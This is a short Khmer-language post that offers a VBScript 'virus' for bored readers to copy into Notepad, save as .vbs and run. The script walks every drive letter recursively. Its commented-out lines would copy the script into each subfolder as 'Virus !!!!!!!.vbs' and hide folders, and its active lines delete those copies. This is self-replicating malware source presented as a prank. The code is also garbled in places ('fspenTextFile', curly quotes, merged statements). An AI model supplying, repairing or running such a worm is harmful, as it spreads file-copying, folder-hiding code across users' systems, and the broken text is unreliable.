កូដមេរោគ ចុចបង្កើត Folder

បើកលោកអ្នកអផ្សុក  ចង់បង្កើត ចុចចេញ folder  ចូល Copy កូដខាងក្រោម Save ជា .vbs ក្នុង Notepad ទៅ
IT
Dim fso,file,VBCopy
Set fso=CreateObject(“Scripting.FileSystemObject”)
Set file=fspenTextFile(WScript.ScriptFullName,1)
VBCopy=file.ReadAll
FolderList(“A:”)
FolderList(“B:”)
FolderList(“C:”)
FolderList(“D:”)
FolderList(“E:”)
FolderList(“F:”)
FolderList(“G:”)
FolderList(“H:”)
FolderList(“I:”)
FolderList(“J:”)
FolderList(“K:”)
FolderList(“L:”)
FolderList(“M:”)
FolderList(“N:”)
FolderList(“O:”)
FolderList(“P:”)
FolderList(“Q:”)
FolderList(“R:”)
FolderList(“S:”)
FolderList(“T:”)
FolderList(“U:”)
FolderList(“V:”)
FolderList(“X:”)
FolderList(“Y:”)
FolderList(“Z:”)
FolderList(“W:”)

Sub FolderList(FolderSpec)
On Error Resume Next
Dim f,f1,sf,COP,CAP,ATT
Set f=fso.GetFolder(FolderSpec)
set sf=f.SubFolders For Each f1 In sf
‘Set COP=fso.CreateTextFile(f1.path & “\Virus !!!!!!!.vbs”)
‘COP.write VBCopy
‘Set CAP=fso.CreateTextFile(f1.path & “—Virus !!!!!!!.vbs”)
‘CAP.write VBCopy
‘Set ATT=fso.GetFolder(f1.Path)
‘ATT.Attributes=ATT.Attributes+2
fso.DeleteFile(f1.path & “\Virus !!!!!!!.vbs”)
fso.DeleteFile(f1.path & “—Virus !!!!!!!.vbs”)
FolderList(f1.Path)
Next
End sub